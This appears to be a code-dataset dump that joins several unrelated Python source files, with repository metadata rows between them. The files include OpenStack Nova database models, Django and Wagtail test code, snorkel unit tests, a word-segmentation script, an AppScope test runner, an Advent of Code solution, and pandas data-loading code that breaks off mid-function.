return ['hosts', 'metadetails', 'availability_zone']
@property
def hosts(self):
return [h.host for h in self._hosts]
@property
def metadetails(self):
return {m.key: m.value for m in self._metadata}
@property
def availability_zone(self):
if 'availability_zone' not in self.metadetails:
return None
return self.metadetails['availability_zone']
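# --- Illustrative sketch (not part of the original Nova models) ---
# The properties above flatten related rows: an aggregate's availability zone
# is simply its 'availability_zone' metadata entry. `aggregate` is an assumed,
# already-loaded Aggregate instance.
def _example_aggregate_availability_zone(aggregate):
    # Equivalent to the availability_zone property defined above.
    return aggregate.metadetails.get('availability_zone')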
class AgentBuild(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents an agent build."""
__tablename__ = 'agent_builds'
__table_args__ = (
Index('agent_builds_hypervisor_os_arch_idx', 'hypervisor', 'os',
'architecture'),
schema.UniqueConstraint("hypervisor", "os", "architecture", "deleted",
name="uniq_agent_builds0hypervisor0os0architecture0deleted"),
)
id = Column(Integer, primary_key=True)
hypervisor = Column(String(255))
os = Column(String(255))
architecture = Column(String(255))
version = Column(String(255))
url = Column(String(255))
md5hash = Column(String(255))
class BandwidthUsage(BASE, NovaBase, models.SoftDeleteMixin):
"""Cache for instance bandwidth usage data pulled from the hypervisor."""
__tablename__ = 'bw_usage_cache'
__table_args__ = (
Index('bw_usage_cache_uuid_start_period_idx', 'uuid',
'start_period'),
)
id = Column(Integer, primary_key=True, nullable=False)
uuid = Column(String(36))
mac = Column(String(255))
start_period = Column(DateTime, nullable=False)
last_refreshed = Column(DateTime)
bw_in = Column(BigInteger)
bw_out = Column(BigInteger)
last_ctr_in = Column(BigInteger)
last_ctr_out = Column(BigInteger)
class VolumeUsage(BASE, NovaBase, models.SoftDeleteMixin):
"""Cache for volume usage data pulled from the hypervisor."""
__tablename__ = 'volume_usage_cache'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False)
volume_id = Column(String(36), nullable=False)
instance_uuid = Column(String(36))
project_id = Column(String(36))
user_id = Column(String(64))
availability_zone = Column(String(255))
tot_last_refreshed = Column(DateTime)
tot_reads = Column(BigInteger, default=0)
tot_read_bytes = Column(BigInteger, default=0)
tot_writes = Column(BigInteger, default=0)
tot_write_bytes = Column(BigInteger, default=0)
curr_last_refreshed = Column(DateTime)
curr_reads = Column(BigInteger, default=0)
curr_read_bytes = Column(BigInteger, default=0)
curr_writes = Column(BigInteger, default=0)
curr_write_bytes = Column(BigInteger, default=0)
class S3Image(BASE, NovaBase, models.SoftDeleteMixin):
"""Compatibility layer for the S3 image service talking to Glance."""
__tablename__ = 's3_images'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
uuid = Column(String(36), nullable=False)
class VolumeIdMapping(BASE, NovaBase, models.SoftDeleteMixin):
"""Compatibility layer for the EC2 volume service."""
__tablename__ = 'volume_id_mappings'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
uuid = Column(String(36), nullable=False)
class SnapshotIdMapping(BASE, NovaBase, models.SoftDeleteMixin):
"""Compatibility layer for the EC2 snapshot service."""
__tablename__ = 'snapshot_id_mappings'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
uuid = Column(String(36), nullable=False)
class InstanceFault(BASE, NovaBase, models.SoftDeleteMixin):
__tablename__ = 'instance_faults'
__table_args__ = (
Index('instance_faults_host_idx', 'host'),
Index('instance_faults_instance_uuid_deleted_created_at_idx',
'instance_uuid', 'deleted', 'created_at')
)
id = Column(Integer, primary_key=True, nullable=False)
instance_uuid = Column(String(36),
ForeignKey('instances.uuid'))
code = Column(Integer(), nullable=False)
message = Column(String(255))
details = Column(MediumText())
host = Column(String(255))
class InstanceAction(BASE, NovaBase, models.SoftDeleteMixin):
"""Track client actions on an instance.
The intention is that there will only be one of these per user request. A
lookup by (instance_uuid, request_id) should always return a single result.
"""
__tablename__ = 'instance_actions'
__table_args__ = (
Index('instance_uuid_idx', 'instance_uuid'),
Index('request_id_idx', 'request_id')
)
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
action = Column(String(255))
instance_uuid = Column(String(36),
ForeignKey('instances.uuid'))
request_id = Column(String(255))
user_id = Column(String(255))
project_id = Column(String(255))
start_time = Column(DateTime, default=timeutils.utcnow)
finish_time = Column(DateTime)
message = Column(String(255))
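# --- Illustrative sketch (not part of the original Nova models) ---
# The InstanceAction docstring promises a single row per (instance_uuid,
# request_id) pair, so a lookup can safely use .one(); `session` is an
# assumed SQLAlchemy Session.
def _example_action_lookup(session, instance_uuid, request_id):
    return session.query(InstanceAction).filter_by(
        instance_uuid=instance_uuid, request_id=request_id, deleted=0).one()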
class InstanceActionEvent(BASE, NovaBase, models.SoftDeleteMixin):
"""Track events that occur during an InstanceAction."""
__tablename__ = 'instance_actions_events'
__table_args__ = ()
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
event = Column(String(255))
action_id = Column(Integer, ForeignKey('instance_actions.id'))
start_time = Column(DateTime, default=timeutils.utcnow)
finish_time = Column(DateTime)
result = Column(String(255))
traceback = Column(Text)
host = Column(String(255))
details = Column(Text)
class InstanceIdMapping(BASE, NovaBase, models.SoftDeleteMixin):
"""Compatibility layer for the EC2 instance service."""
__tablename__ = 'instance_id_mappings'
__table_args__ = (
Index('ix_instance_id_mappings_uuid', 'uuid'),
)
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
uuid = Column(String(36), nullable=False)
class TaskLog(BASE, NovaBase, models.SoftDeleteMixin):
"""Audit log for background periodic tasks."""
__tablename__ = 'task_log'
__table_args__ = (
schema.UniqueConstraint(
'task_name', 'host', 'period_beginning', 'period_ending',
name="uniq_task_log0task_name0host0period_beginning0period_ending"
),
Index('ix_task_log_period_beginning', 'period_beginning'),
Index('ix_task_log_host', 'host'),
Index('ix_task_log_period_ending', 'period_ending'),
)
id = Column(Integer, primary_key=True, nullable=False, autoincrement=True)
task_name = Column(String(255), nullable=False)
state = Column(String(255), nullable=False)
host = Column(String(255), nullable=False)
period_beginning = Column(DateTime, default=timeutils.utcnow,
nullable=False)
period_ending = Column(DateTime, default=timeutils.utcnow,
nullable=False)
message = Column(String(255), nullable=False)
task_items = Column(Integer(), default=0)
errors = Column(Integer(), default=0)
class InstanceGroupMember(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents the members for an instance group."""
__tablename__ = 'instance_group_member'
__table_args__ = (
Index('instance_group_member_instance_idx', 'instance_id'),
)
id = Column(Integer, primary_key=True, nullable=False)
instance_id = Column(String(255))
group_id = Column(Integer, ForeignKey('instance_groups.id'),
nullable=False)
class InstanceGroupPolicy(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents the policy type for an instance group."""
__tablename__ = 'instance_group_policy'
__table_args__ = (
Index('instance_group_policy_policy_idx', 'policy'),
)
id = Column(Integer, primary_key=True, nullable=False)
policy = Column(String(255))
group_id = Column(Integer, ForeignKey('instance_groups.id'),
nullable=False)
class InstanceGroup(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents an instance group.
A group will maintain a collection of instances and the relationship
between them.
"""
__tablename__ = 'instance_groups'
__table_args__ = (
schema.UniqueConstraint("uuid", "deleted",
name="uniq_instance_groups0uuid0deleted"),
)
id = Column(Integer, primary_key=True, autoincrement=True)
user_id = Column(String(255))
project_id = Column(String(255))
uuid = Column(String(36), nullable=False)
name = Column(String(255))
_policies = orm.relationship(InstanceGroupPolicy, primaryjoin='and_('
'InstanceGroup.id == InstanceGroupPolicy.group_id,'
'InstanceGroupPolicy.deleted == 0,'
'InstanceGroup.deleted == 0)')
_members = orm.relationship(InstanceGroupMember, primaryjoin='and_('
'InstanceGroup.id == InstanceGroupMember.group_id,'
'InstanceGroupMember.deleted == 0,'
'InstanceGroup.deleted == 0)')
@property
def policies(self):
return [p.policy for p in self._policies]
@property
def members(self):
return [m.instance_id for m in self._members]
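# --- Illustrative sketch (not part of the original Nova models) ---
# The two properties above flatten the related rows: group.policies is a list
# of policy-name strings and group.members a list of instance UUID strings.
def _example_group_summary(group):
    # e.g. (['anti-affinity'], 3) for a group with one policy and three members
    return group.policies, len(group.members)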
class PciDevice(BASE, NovaBase, models.SoftDeleteMixin):
"""Represents a PCI host device that can be passed through to instances.
"""
__tablename__ = 'pci_devices'
__table_args__ = (
Index('ix_pci_devices_compute_node_id_deleted',
'compute_node_id', 'deleted'),
Index('ix_pci_devices_instance_uuid_deleted',
'instance_uuid', 'deleted'),
Index('ix_pci_devices_compute_node_id_parent_addr_deleted',
'compute_node_id', 'parent_addr', 'deleted'),
schema.UniqueConstraint(
"compute_node_id", "address", "deleted",
name="uniq_pci_devices0compute_node_id0address0deleted")
)
id = Column(Integer, primary_key=True)
compute_node_id = Column(Integer, ForeignKey('compute_nodes.id'),
nullable=False)
# physical address of device domain:bus:slot.func (0000:09:01.1)
address = Column(String(12), nullable=False)
vendor_id = Column(String(4), nullable=False)
product_id = Column(String(4), nullable=False)
dev_type = Column(String(8), nullable=False)
dev_id = Column(String(255))
    # label is an abstract device name used to unify devices that have the
    # same functionality but different addresses or hosts.
label = Column(String(255), nullable=False)
status = Column(String(36), nullable=False)
# the request_id is used to identify a device that is allocated for a
# particular request
request_id = Column(String(36), nullable=True)
extra_info = Column(Text)
instance_uuid = Column(String(36))
numa_node = Column(Integer, nullable=True)
parent_addr = Column(String(12), nullable=True)
instance = orm.relationship(Instance, backref="pci_devices",
foreign_keys=instance_uuid,
primaryjoin='and_('
'PciDevice.instance_uuid == Instance.uuid,'
'PciDevice.deleted == 0)')
class Tag(BASE, models.ModelBase):
"""Represents the tag for a resource."""
__tablename__ = "tags"
__table_args__ = (
Index('tags_tag_idx', 'tag'),
)
resource_id = Column(String(36), primary_key=True, nullable=False)
tag = Column(Unicode(80), primary_key=True, nullable=False)
instance = orm.relationship(
"Instance",
backref='tags',
primaryjoin='and_(Tag.resource_id == Instance.uuid,'
'Instance.deleted == 0)',
foreign_keys=resource_id
)
| 38.24896 | 79 | 0.655679 |
c01c1c1eab89496438e9652655814aee4d400256 | 251 | py | Python | orttraining/orttraining/python/training/optim/__init__.py | sstamenova/onnxruntime | beddbdec5a100f1b94ae68d0c56d6c229fabb33b | ["MIT"] | 6,036 | 2019-05-07T06:03:57.000Z | 2022-03-31T17:59:54.000Z |
orttraining/orttraining/python/training/optim/__init__.py | sstamenova/onnxruntime | beddbdec5a100f1b94ae68d0c56d6c229fabb33b | ["MIT"] | 5,730 | 2019-05-06T23:04:55.000Z | 2022-03-31T23:55:56.000Z |
orttraining/orttraining/python/training/optim/__init__.py | sstamenova/onnxruntime | beddbdec5a100f1b94ae68d0c56d6c229fabb33b | ["MIT"] | 1,566 | 2019-05-07T01:30:07.000Z | 2022-03-31T17:06:50.000Z |
from .config import _OptimizerConfig, AdamConfig, LambConfig, SGDConfig
from .lr_scheduler import _LRScheduler, ConstantWarmupLRScheduler, CosineWarmupLRScheduler,\
LinearWarmupLRScheduler, PolyWarmupLRScheduler
from .fused_adam import FusedAdam
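# --- Illustrative sketch (not part of the original module) ---
# Rough idea of how the re-exported names are typically combined; the keyword
# arguments below are assumptions about the constructors, not verified here:
#   optim_config = AdamConfig(lr=1e-3)
#   lr_scheduler = LinearWarmupLRScheduler(total_steps=1000, warmup=0.1)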
| 41.833333 | 92 | 0.860558 |
e4ce35e1c8ff96c44eaea5f172a25f83d3c6d1b7 | 369 | py | Python | mrp_system/migrations/0016_auto_20181206_1258.py | mgeorge8/django_time | f75a442941b0ebbb6cc46a6d18e42b91695b7e57 | ["MIT"] | 1 | 2018-11-09T02:09:14.000Z | 2018-11-09T02:09:14.000Z |
mrp_system/migrations/0016_auto_20181206_1258.py | mgeorge8/django_time | f75a442941b0ebbb6cc46a6d18e42b91695b7e57 | ["MIT"] | null | null | null |
mrp_system/migrations/0016_auto_20181206_1258.py | mgeorge8/django_time | f75a442941b0ebbb6cc46a6d18e42b91695b7e57 | ["MIT"] | null | null | null |
# Generated by Django 2.1.2 on 2018-12-06 19:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mrp_system', '0015_auto_20181206_1257'),
]
operations = [
migrations.RenameField(
model_name='part',
old_name='location2',
new_name='location',
),
]
| 19.421053 | 50 | 0.590786 |
de78809212ca26aee01233497bd3a0d5dd38200a | 5,020 | py | Python | vq_wordseg.py | kamperh/vqwordseg | fc92e4125ebaad6d7d8c376b7e0c43e6b4dce15e | ["MIT"] | 10 | 2022-02-25T15:14:09.000Z | 2022-03-11T11:30:04.000Z |
vq_wordseg.py | kamperh/vqwordseg | fc92e4125ebaad6d7d8c376b7e0c43e6b4dce15e | ["MIT"] | null | null | null |
vq_wordseg.py | kamperh/vqwordseg | fc92e4125ebaad6d7d8c376b7e0c43e6b4dce15e | ["MIT"] | 2 | 2022-03-09T08:39:44.000Z | 2022-03-25T06:21:32.000Z |
#!/usr/bin/env python
"""
Perform word segmentation on VQ representations.
Author: Herman Kamper
Contact: kamperh@gmail.com
Date: 2021
"""
from datetime import datetime
from pathlib import Path
from tqdm import tqdm
import argparse
import sys
from vqwordseg import algorithms
import eval_segmentation
#-----------------------------------------------------------------------------#
# UTILITY FUNCTIONS #
#-----------------------------------------------------------------------------#
def check_argv():
"""Check the command line arguments."""
parser = argparse.ArgumentParser(
description=__doc__.strip().split("\n")[0], add_help=False
)
parser.add_argument(
"model", help="input VQ representations",
choices=["vqvae", "vqcpc", "cpc_big", "gmm"]
)
parser.add_argument("dataset", type=str, help="input dataset")
parser.add_argument(
"split", type=str, help="input split", choices=["train", "val", "test"]
)
parser.add_argument(
"phoneseg_tag", type=str, help="input phone segmentation"
)
parser.add_argument(
"--algorithm",
help="word segmentation algorithm (default: %(default)s)",
choices=["ag", "tp", "rasanen15", "dpdp_aernn"], default="ag"
)
parser.add_argument(
"--output_tag", type=str, help="used to name the output directory; "
"if not specified, the algorithm is used",
default=None
)
parser.add_argument(
"--dur_weight", type=float,
help="the duration penalty weight",
default=None
)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
#-----------------------------------------------------------------------------#
# MAIN FUNCTION #
#-----------------------------------------------------------------------------#
def main():
args = check_argv()
# Command-line arguments
segment_func = getattr(algorithms, args.algorithm)
if args.output_tag is None:
args.output_tag = "wordseg_{}_{}".format(
args.algorithm,
args.phoneseg_tag.replace("phoneseg_", "")
)
if args.dur_weight is not None:
print(f"Duration weight: {args.dur_weight:.4f}")
# Phone intervals
input_dir = (
Path("exp")/args.model/args.dataset/args.split/
args.phoneseg_tag/"intervals"
)
phoneseg_interval_dict = {}
print("Reading: {}".format(input_dir))
assert input_dir.is_dir(), "missing directory: {}".format(input_dir)
phoneseg_interval_dict = eval_segmentation.get_intervals_from_dir(
input_dir
)
utterances = phoneseg_interval_dict.keys()
# # Temp
# print(list(utterances)[228], list(utterances)[5569])
# assert False
# Segmentation
print(datetime.now())
print("Segmenting:")
prepared_text = []
for utt_key in utterances:
prepared_text.append(
" ".join([i[2] + "_" for i in phoneseg_interval_dict[utt_key]])
)
if args.dur_weight is not None:
word_segmentation = segment_func(
prepared_text, dur_weight=args.dur_weight
)
else:
word_segmentation = segment_func(
prepared_text
)
print(datetime.now())
# print(prepared_text[:10])
# print(word_segmentation[:10])
# assert False
wordseg_interval_dict = {}
for i_utt, utt_key in tqdm(enumerate(utterances)):
words_segmented = word_segmentation[i_utt].split(" ")
word_start = 0
word_label = ""
i_word = 0
wordseg_interval_dict[utt_key] = []
for (phone_start,
phone_end, phone_label) in phoneseg_interval_dict[utt_key]:
word_label += phone_label + "_"
if i_word >= len(words_segmented):
wordseg_interval_dict[utt_key].append((
word_start, phoneseg_interval_dict[utt_key][-1][1],
"999_" #word_label
))
break
if words_segmented[i_word] == word_label:
wordseg_interval_dict[utt_key].append((
word_start, phone_end, word_label
))
word_label = ""
word_start = phone_end
i_word += 1
# Write intervals
output_dir = (
Path("exp")/args.model/args.dataset/args.split/
args.output_tag/"intervals"
)
output_dir.mkdir(exist_ok=True, parents=True)
print("Writing to: {}".format(output_dir))
for utt_key in tqdm(wordseg_interval_dict):
with open((output_dir/utt_key).with_suffix(".txt"), "w") as f:
for start, end, label in wordseg_interval_dict[utt_key]:
f.write("{:d} {:d} {}\n".format(start, end, label))
if __name__ == "__main__":
main()
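# --- Illustrative invocation (not part of the original script) ---
# Built from the argparse definition above; the dataset, split and phoneseg
# tag values are hypothetical placeholders:
#   python vq_wordseg.py vqcpc buckeye val phoneseg_tag --algorithm dpdp_aernn --dur_weight 3.0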
| 32.387097 | 79 | 0.54741 |
0d01f8a63fa22896bf11249901ceb7ee7fc88c23 | 3,924 | py | Python | test/utils/test_core.py | dataframing/snorkel | be6cec76f6758ed6f8d0ca5da7342af28ad5486c | ["Apache-2.0"] | 1 | 2019-12-25T01:13:06.000Z | 2019-12-25T01:13:06.000Z |
test/utils/test_core.py | dataframing/snorkel | be6cec76f6758ed6f8d0ca5da7342af28ad5486c | ["Apache-2.0"] | null | null | null |
test/utils/test_core.py | dataframing/snorkel | be6cec76f6758ed6f8d0ca5da7342af28ad5486c | ["Apache-2.0"] | null | null | null |
import unittest
import numpy as np
from snorkel.utils import (
filter_labels,
preds_to_probs,
probs_to_preds,
to_int_label_array,
)
PROBS = np.array([[0.1, 0.9], [0.7, 0.3]])
PREDS = np.array([1, 0])
PREDS_ROUND = np.array([[0, 1], [1, 0]])
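# --- Worked example (not part of the original tests) ---
# These constants encode the round trip exercised below: probs_to_preds takes
# the per-row argmax, so PROBS -> array([1, 0]) == PREDS, while
# preds_to_probs(PREDS, 2) one-hot encodes to [[0, 1], [1, 0]] == PREDS_ROUND.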
class UtilsTest(unittest.TestCase):
def test_to_int_label_array(self):
X = np.array([[1], [0], [2.0]])
Y_expected = np.array([1, 0, 2])
Y = to_int_label_array(X, flatten_vector=True)
np.testing.assert_array_equal(Y, Y_expected)
Y = to_int_label_array(X, flatten_vector=False)
Y_expected = np.array([[1], [0], [2]])
np.testing.assert_array_equal(Y, Y_expected)
X = np.array([[1], [0], [2.1]])
with self.assertRaisesRegex(ValueError, "non-integer value"):
to_int_label_array(X)
X = np.array([[1, 0], [0, 1]])
with self.assertRaisesRegex(ValueError, "1d np.array"):
to_int_label_array(X, flatten_vector=True)
def test_preds_to_probs(self):
np.testing.assert_array_equal(preds_to_probs(PREDS, 2), PREDS_ROUND)
def test_probs_to_preds(self):
np.testing.assert_array_equal(probs_to_preds(PROBS), PREDS)
        # abstains with ties
probs = np.array([[0.33, 0.33, 0.33]])
preds = probs_to_preds(probs, tie_break_policy="abstain")
true_preds = np.array([-1])
np.testing.assert_array_equal(preds, true_preds)
# true random with ties
probs = np.array([[0.33, 0.33, 0.33]])
random_preds = []
for seed in range(10):
preds = probs_to_preds(probs, tie_break_policy="true-random")
random_preds.append(preds[0])
# check predicted labels within range
self.assertLessEqual(max(random_preds), 2)
self.assertGreaterEqual(min(random_preds), 0)
# deterministic random with ties
probs = np.array(
[[0.33, 0.33, 0.33], [0.0, 0.5, 0.5], [0.33, 0.33, 0.33], [0.5, 0.5, 0]]
)
random_preds = []
for _ in range(10):
preds = probs_to_preds(probs, tie_break_policy="random")
random_preds.append(preds)
# check labels are same across seeds
for i in range(len(random_preds) - 1):
np.testing.assert_array_equal(random_preds[i], random_preds[i + 1])
        # check predicted labels are within range (checking one instance is enough since they should all be the same)
self.assertLessEqual(max(random_preds[0]), 2)
self.assertGreaterEqual(min(random_preds[0]), 0)
# check invalid policy
with self.assertRaisesRegex(ValueError, "policy not recognized"):
preds = probs_to_preds(probs, tie_break_policy="negative")
# check invalid input
with self.assertRaisesRegex(ValueError, "probs must have probabilities"):
preds = probs_to_preds(np.array([[0.33], [0.33]]))
def test_filter_labels(self):
golds = np.array([-1, 0, 0, 1, 1])
preds = np.array([0, 0, 1, 1, -1])
filtered = filter_labels(
label_dict={"golds": golds, "preds": preds},
filter_dict={"golds": [-1], "preds": [-1]},
)
np.testing.assert_array_equal(filtered["golds"], np.array([0, 0, 1]))
np.testing.assert_array_equal(filtered["preds"], np.array([0, 1, 1]))
def test_filter_labels_probs(self):
golds = np.array([-1, 0, 0, 1, 1])
preds = np.array([0, 0, 1, 1, -1])
probs = np.array([[0.8, 0.2], [0.8, 0.2], [0.2, 0.8], [0.2, 0.8], [0.5, 0.5]])
filtered = filter_labels(
label_dict={"golds": golds, "preds": preds, "probs": probs},
filter_dict={"golds": [-1], "preds": [-1]},
)
np.testing.assert_array_equal(filtered["golds"], np.array([0, 0, 1]))
np.testing.assert_array_equal(filtered["preds"], np.array([0, 1, 1]))
if __name__ == "__main__":
unittest.main()
| 36.333333 | 90 | 0.596585 |
02b6125ffd5d1bd41c0bc5efb920129deab4f77f | 1,107 | py | Python | wagtail/tests/routablepage/models.py | hanpama/wagtail | e0e3cdc824b1acd9f9daa6d80b5455c969b385dd | ["BSD-3-Clause"] | null | null | null |
wagtail/tests/routablepage/models.py | hanpama/wagtail | e0e3cdc824b1acd9f9daa6d80b5455c969b385dd | ["BSD-3-Clause"] | null | null | null |
wagtail/tests/routablepage/models.py | hanpama/wagtail | e0e3cdc824b1acd9f9daa6d80b5455c969b385dd | ["BSD-3-Clause"] | 1 | 2019-03-05T15:37:22.000Z | 2019-03-05T15:37:22.000Z |
from django.http import HttpResponse
from wagtail.contrib.wagtailroutablepage.models import RoutablePage, route
def routable_page_external_view(request, arg="ARG NOT SET"):
return HttpResponse("EXTERNAL VIEW: " + arg)
class RoutablePageTest(RoutablePage):
@route(r'^$')
def main(self, request):
return HttpResponse("MAIN VIEW")
@route(r'^archive/year/(\d+)/$')
def archive_by_year(self, request, year):
return HttpResponse("ARCHIVE BY YEAR: " + str(year))
@route(r'^archive/author/(?P<author_slug>.+)/$')
def archive_by_author(self, request, author_slug):
return HttpResponse("ARCHIVE BY AUTHOR: " + author_slug)
@route(r'^external/(.+)/$')
@route(r'^external-no-arg/$')
def external_view(self, *args, **kwargs):
return routable_page_external_view(*args, **kwargs)
# By default, the method name would be used as the url name but when the
# "name" kwarg is specified, this should override the default.
@route(r'^override-name-test/$', name='name_overridden')
def override_name_test(self, request):
pass
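# --- Illustrative note (not part of the original test models) ---
# Assuming the usual RoutablePage API, a route is reversed by its url name,
# e.g. page.reverse_subpage('archive_by_year', args=(2014,)) is expected to
# return 'archive/year/2014/', and the last route above is registered under
# 'name_overridden' rather than the method name.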
| 33.545455 | 76 | 0.682023 |
9f2406f2ca556ff28b4d535eb6815a242f380814 | 1,785 | py | Python | test/testContainers/test_runner/proc.py | guijan/appscope | 8b507606914f486b6858b5115c44faf7d342666a | ["Apache-2.0"] | 118 | 2021-01-21T16:36:13.000Z | 2022-03-18T09:05:18.000Z |
test/testContainers/test_runner/proc.py | guijan/appscope | 8b507606914f486b6858b5115c44faf7d342666a | ["Apache-2.0"] | 684 | 2021-01-21T06:51:06.000Z | 2022-03-31T14:34:42.000Z |
test/testContainers/test_runner/proc.py | guijan/appscope | 8b507606914f486b6858b5115c44faf7d342666a | ["Apache-2.0"] | 26 | 2021-01-26T22:53:45.000Z | 2022-02-11T09:19:31.000Z |
import logging
import os
import subprocess
import time
from common import AppController
class SubprocessAppController(AppController):
def __init__(self, start_command, name, scope_path, logs_path, start_wait=5, stop_wait=11):
super().__init__(name)
self.logs_path = logs_path
self.scope_path = scope_path
self.stop_wait = stop_wait
self.start_wait = start_wait
self.start_command = start_command
self.proc = None
self.__stdout_file = None
def start(self, scoped=False):
stdout_path = os.path.join(self.logs_path, f"{self.name}_stdout.log")
logging.info(
f"Starting app {self.name} in {'scoped' if scoped else 'unscoped'} mode. Output will be stored in {stdout_path}")
env = os.environ.copy()
if scoped:
env["LD_PRELOAD"] = self.scope_path
logging.debug(f"Command is {self.start_command}. Environment {env}")
self.__stdout_file = open(stdout_path, "a")
self.proc = subprocess.Popen(self.start_command, env=env, stdout=self.__stdout_file)
time.sleep(self.start_wait)
self.assert_running()
def stop(self):
self.proc.terminate()
self.proc.communicate()
self.__stdout_file.flush()
time.sleep(self.stop_wait)
def assert_running(self):
        assert self.proc.poll() is None, f"{self.name} has crashed"
def wait_for_stdout_msg(proc, msg, timeout=60):
timeout_start = time.time()
while time.time() < timeout_start + timeout:
line = proc.stdout.readline()
if not line:
break
logging.debug(line)
if msg in line:
return
raise TimeoutError(f"Message '{msg}' wasn't found in stdout after {timeout} seconds.")
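# --- Illustrative sketch (not part of the original test runner) ---
# Minimal use of SubprocessAppController above; the command, scope library
# path and log directory are hypothetical placeholders.
def _example_run_scoped(scope_path="/tmp/libscope.so", logs_path="/tmp/logs"):
    app = SubprocessAppController(["sleep", "60"], "sleep_app", scope_path, logs_path)
    app.start(scoped=True)  # start() injects the library via LD_PRELOAD, as shown above
    app.stop()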
| 30.775862 | 125 | 0.6493 |
f11464b7960b5195f15a43685050a4eb1b33af41 | 853 | py | Python | 10/solve.py | jkowalleck/AoC2020 | 861b5abbd55b58460cf1036ab5ed0b9ddaf7d770 | ["MIT"] | null | null | null |
10/solve.py | jkowalleck/AoC2020 | 861b5abbd55b58460cf1036ab5ed0b9ddaf7d770 | ["MIT"] | null | null | null |
10/solve.py | jkowalleck/AoC2020 | 861b5abbd55b58460cf1036ab5ed0b9ddaf7d770 | ["MIT"] | null | null | null |
from collections import Counter
from os import path
from typing import Generator, List
INPUT_FILE = path.join(path.dirname(__file__), 'input')
def get_input() -> List[str]:
with open(INPUT_FILE) as fh:
return fh.read().splitlines()
def diffs(adapters: List[int]) -> Generator[int, int, None]:
yield adapters[0]
for a, adapter in enumerate(adapters[1:]):
yield adapter - adapters[a]
def solve1() -> int:
adapters = sorted(map(int, get_input()))
counts = Counter(diffs(adapters))
    return counts[1] * (counts[3] + 1)  # the built-in adapter adds a final diff of 3
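# --- Worked example (not part of the original solution) ---
# For the small AoC sample [16, 10, 15, 5, 1, 11, 7, 19, 6, 12, 4], the sorted
# chain yields seven 1-jolt gaps and four 3-jolt gaps; counts[3] + 1 adds the
# device's own +3 step, so solve1 would return 7 * (4 + 1) = 35.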
def solve2() -> int:
# TODO
raise NotImplementedError()
if __name__ == '__main__':
solution_part1 = solve1()
print(f'solution part 1: {solution_part1}')
#solution_part2 = solve2()
#print(f'solution part 2: {solution_part2}')
| 24.371429 | 78 | 0.664713 |
0998cf5d6ed8fe8ae28cc2ed3854e21037b2efd1 | 15,291 | py | Python | pqviz/create_dataframes.py | mitre/PQViz | 229e662c408e0532df44585d134b8e79eb6c4cf8 | ["Apache-2.0"] | null | null | null |
pqviz/create_dataframes.py | mitre/PQViz | 229e662c408e0532df44585d134b8e79eb6c4cf8 | ["Apache-2.0"] | null | null | null |
pqviz/create_dataframes.py | mitre/PQViz | 229e662c408e0532df44585d134b8e79eb6c4cf8 | ["Apache-2.0"] | 1 | 2022-01-18T21:00:39.000Z | 2022-01-18T21:00:39.000Z |
from pathlib import Path
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import us
def create_prevalence_df(file_path, population_group):
"""
Creates a data frame that includes the prevalences and the demographic data
Parameters:
file_path: A folder with pq outputs to compare
population_group: Type of population, expected inputs ['Pediatric', 'Adult']
Returns:
A DataFrame where the rows are distinct demographic and prevalence numbers."""
    # create a list of all the CSVs in the path
all_files = list(file_path.glob("**/*"))
# import census location data
    # define an empty list to build the df from
all_df = []
# import files
if population_group == "Pediatric":
for filename in all_files:
print(f"Reading {filename}")
# read in csv
# Adding error-catching loop with output note for debugging
try:
df = pd.read_csv(filename, index_col=None, header=0)
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
except Exception as e:
print(f"File {filename} has no data, skipping")
continue
            # read in sex as output by pq
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["sex"] = sex
            # read in race as output by pq
race = (
df[df["Order"] == 7]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["race"] = race
            # read in location code as output by pq
location_code = (
df[df["Order"] == 10]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# identify state
if len(location_code) == 2:
state_cd = location_code
df["zcta3"] = np.nan
else:
zcta3 = []
states = []
for loc in [l.strip() for l in location_code.split(",")]:
zcta3.append(loc[2:])
states.append(loc[:2])
df["zcta3"] = ",".join(zcta3)
states = list(set(states))
state_cd = ",".join(states)
state = us.states.lookup(state_cd)
df["state"] = state
            # read in age as output by pq
age = (
df[df["Order"] == 5]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# converting to list
df["age"] = age
df["filename"] = filename
year = (
df[df["Order"] == 11]["Weight Category"]
.str.extract(":(.*)", expand=True)
.reset_index()
.at[0, 0]
)
df["year"] = year
# add dataframe to list
all_df.append(df)
if population_group == "Adult":
for filename in all_files:
print(f"Reading {filename}")
# read in csv
# Adding error-catching loop with output note for debugging
try:
df = pd.read_csv(filename, index_col=None, header=0)
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
except Exception as e:
print(f"File {filename} has no data, skipping")
continue
            # read in sex as output by pq
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["sex"] = sex
            # read in race as output by pq
race = (
df[df["Order"] == 8]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["race"] = race
            # read in location code as output by pq
location_code = (
df[df["Order"] == 11]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# identify state
